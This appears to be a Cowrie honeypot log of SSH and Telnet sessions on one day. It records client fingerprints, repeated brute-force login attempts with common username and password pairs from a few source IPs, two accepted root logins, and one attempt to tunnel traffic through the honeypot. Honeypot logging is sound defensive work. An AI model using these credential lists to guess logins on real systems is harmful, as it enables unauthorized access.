{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:11:21.029879Z","src_ip":"212.227.125.160","session":"327071586789"}
{"eventid":"cowrie.login.failed","username":"fedora","password":"password","message":"login attempt [fedora/password] failed","sensor":"my-vps","timestamp":"2025-08-28T14:11:21.730214Z","src_ip":"212.227.125.160","session":"327071586789"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:11:22.909353Z","src_ip":"212.227.125.160","session":"327071586789"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40882,"dst_ip":"1.2.3.4","dst_port":22,"session":"e570ee56a612","protocol":"ssh","message":"New connection: 212.227.125.160:40882 (1.2.3.4:22) [session: e570ee56a612]","sensor":"my-vps","timestamp":"2025-08-28T14:11:54.529585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:11:54.530555Z","src_ip":"212.227.125.160","session":"e570ee56a612"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:11:54.694114Z","src_ip":"212.227.125.160","session":"e570ee56a612"}
{"eventid":"cowrie.login.failed","username":"fedora","password":"123456789","message":"login attempt [fedora/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T14:11:55.191641Z","src_ip":"212.227.125.160","session":"e570ee56a612"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:11:56.357255Z","src_ip":"212.227.125.160","session":"e570ee56a612"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54042,"dst_ip":"1.2.3.4","dst_port":23,"session":"a74739181dd2","protocol":"telnet","message":"New connection: 212.227.125.160:54042 (1.2.3.4:23) [session: a74739181dd2]","sensor":"my-vps","timestamp":"2025-08-28T14:12:11.211281Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51552,"dst_ip":"1.2.3.4","dst_port":22,"session":"644bc62f5c54","protocol":"ssh","message":"New connection: 212.227.125.160:51552 (1.2.3.4:22) [session: 644bc62f5c54]","sensor":"my-vps","timestamp":"2025-08-28T14:12:28.262352Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:12:28.297564Z","src_ip":"212.227.125.160","session":"644bc62f5c54"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:12:28.430461Z","src_ip":"212.227.125.160","session":"644bc62f5c54"}
{"eventid":"cowrie.login.failed","username":"fedora","password":"12345","message":"login attempt [fedora/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T14:12:29.088286Z","src_ip":"212.227.125.160","session":"644bc62f5c54"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:12:30.255437Z","src_ip":"212.227.125.160","session":"644bc62f5c54"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57242,"dst_ip":"1.2.3.4","dst_port":22,"session":"3015a935bd99","protocol":"ssh","message":"New connection: 217.72.205.35:57242 (1.2.3.4:22) [session: 3015a935bd99]","sensor":"my-vps","timestamp":"2025-08-28T14:12:53.805955Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:12:53.807199Z","src_ip":"217.72.205.35","session":"3015a935bd99"}
{"eventid":"cowrie.session.closed","duration":46.16669702529907,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:12:57.377907Z","src_ip":"212.227.125.160","session":"a74739181dd2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53518,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbca57ad4f01","protocol":"ssh","message":"New connection: 212.227.125.160:53518 (1.2.3.4:22) [session: bbca57ad4f01]","sensor":"my-vps","timestamp":"2025-08-28T14:13:01.936895Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:13:01.938266Z","src_ip":"212.227.125.160","session":"bbca57ad4f01"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:13:02.113644Z","src_ip":"212.227.125.160","session":"bbca57ad4f01"}
{"eventid":"cowrie.login.failed","username":"fedora","password":"12345678","message":"login attempt [fedora/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T14:13:03.068181Z","src_ip":"212.227.125.160","session":"bbca57ad4f01"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:13:04.246545Z","src_ip":"212.227.125.160","session":"bbca57ad4f01"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38727,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ca16f1dfbb2","protocol":"ssh","message":"New connection: 212.227.235.229:38727 (1.2.3.4:22) [session: 3ca16f1dfbb2]","sensor":"my-vps","timestamp":"2025-08-28T14:13:31.197443Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:13:31.198517Z","src_ip":"212.227.235.229","session":"3ca16f1dfbb2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39065,"dst_ip":"1.2.3.4","dst_port":22,"session":"7527d154c627","protocol":"ssh","message":"New connection: 212.227.235.229:39065 (1.2.3.4:22) [session: 7527d154c627]","sensor":"my-vps","timestamp":"2025-08-28T14:13:31.328591Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:13:31.329262Z","src_ip":"212.227.235.229","session":"7527d154c627"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T14:13:31.464102Z","src_ip":"212.227.235.229","session":"7527d154c627"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:13:31.869014Z","src_ip":"212.227.235.229","session":"7527d154c627"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T14:13:32.004494Z","session":"7527d154c627"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53822,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0633a340c16","protocol":"ssh","message":"New connection: 212.227.125.160:53822 (1.2.3.4:22) [session: c0633a340c16]","sensor":"my-vps","timestamp":"2025-08-28T14:13:35.824422Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:13:35.825594Z","src_ip":"212.227.125.160","session":"c0633a340c16"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:13:35.998477Z","src_ip":"212.227.125.160","session":"c0633a340c16"}
{"eventid":"cowrie.login.failed","username":"fedora","password":"qwerty","message":"login attempt [fedora/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T14:13:36.520252Z","src_ip":"212.227.125.160","session":"c0633a340c16"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:13:37.696068Z","src_ip":"212.227.125.160","session":"c0633a340c16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63088,"dst_ip":"1.2.3.4","dst_port":22,"session":"8595fccd92fc","protocol":"ssh","message":"New connection: 212.227.235.229:63088 (1.2.3.4:22) [session: 8595fccd92fc]","sensor":"my-vps","timestamp":"2025-08-28T14:13:38.148785Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T14:13:38.164992Z","src_ip":"212.227.235.229","session":"8595fccd92fc"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T14:13:38.306408Z","src_ip":"212.227.235.229","session":"8595fccd92fc"}
{"eventid":"cowrie.login.failed","username":"nichole","password":"nichole","message":"login attempt [nichole/nichole] failed","sensor":"my-vps","timestamp":"2025-08-28T14:13:38.906816Z","src_ip":"212.227.235.229","session":"8595fccd92fc"}
{"eventid":"cowrie.login.failed","username":"nichole","password":"nichole1","message":"login attempt [nichole/nichole1] failed","sensor":"my-vps","timestamp":"2025-08-28T14:13:40.058223Z","src_ip":"212.227.235.229","session":"8595fccd92fc"}
{"eventid":"cowrie.login.failed","username":"nichole","password":"nichole123","message":"login attempt [nichole/nichole123] failed","sensor":"my-vps","timestamp":"2025-08-28T14:13:41.212207Z","src_ip":"212.227.235.229","session":"8595fccd92fc"}
{"eventid":"cowrie.login.failed","username":"nichole","password":"nichole1234","message":"login attempt [nichole/nichole1234] failed","sensor":"my-vps","timestamp":"2025-08-28T14:13:42.375631Z","src_ip":"212.227.235.229","session":"8595fccd92fc"}
{"eventid":"cowrie.login.failed","username":"nichole","password":"nichole12345","message":"login attempt [nichole/nichole12345] failed","sensor":"my-vps","timestamp":"2025-08-28T14:13:43.554883Z","src_ip":"212.227.235.229","session":"8595fccd92fc"}
{"eventid":"cowrie.session.closed","duration":"6.6","message":"Connection lost after 6.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:13:44.724386Z","src_ip":"212.227.235.229","session":"8595fccd92fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51214,"dst_ip":"1.2.3.4","dst_port":23,"session":"09406f7aa1a1","protocol":"telnet","message":"New connection: 212.227.125.160:51214 (1.2.3.4:23) [session: 09406f7aa1a1]","sensor":"my-vps","timestamp":"2025-08-28T14:14:09.871719Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T14:14:09.955563Z","src_ip":"212.227.125.160","session":"09406f7aa1a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T14:14:09.971900Z","src_ip":"212.227.125.160","session":"09406f7aa1a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41672,"dst_ip":"1.2.3.4","dst_port":22,"session":"3755af0f4c4e","protocol":"ssh","message":"New connection: 212.227.125.160:41672 (1.2.3.4:22) [session: 3755af0f4c4e]","sensor":"my-vps","timestamp":"2025-08-28T14:14:11.229720Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:14:11.230475Z","src_ip":"212.227.125.160","session":"3755af0f4c4e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:14:11.434719Z","src_ip":"212.227.125.160","session":"3755af0f4c4e"}
{"eventid":"cowrie.login.failed","username":"fedora","password":"123123","message":"login attempt [fedora/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T14:14:12.001202Z","src_ip":"212.227.125.160","session":"3755af0f4c4e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:14:13.164542Z","src_ip":"212.227.125.160","session":"3755af0f4c4e"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:14:41.328955Z","src_ip":"212.227.235.229","session":"7527d154c627"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59846,"dst_ip":"1.2.3.4","dst_port":22,"session":"66f619fc3b75","protocol":"ssh","message":"New connection: 212.227.125.160:59846 (1.2.3.4:22) [session: 66f619fc3b75]","sensor":"my-vps","timestamp":"2025-08-28T14:14:47.580565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T14:14:47.582607Z","src_ip":"212.227.125.160","session":"66f619fc3b75"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T14:14:47.749505Z","src_ip":"212.227.125.160","session":"66f619fc3b75"}
{"eventid":"cowrie.login.failed","username":"fedora","password":"111111","message":"login attempt [fedora/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T14:14:48.422498Z","src_ip":"212.227.125.160","session":"66f619fc3b75"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T14:14:49.592756Z","src_ip":"212.227.125.160","session":"66f619fc3b75"}
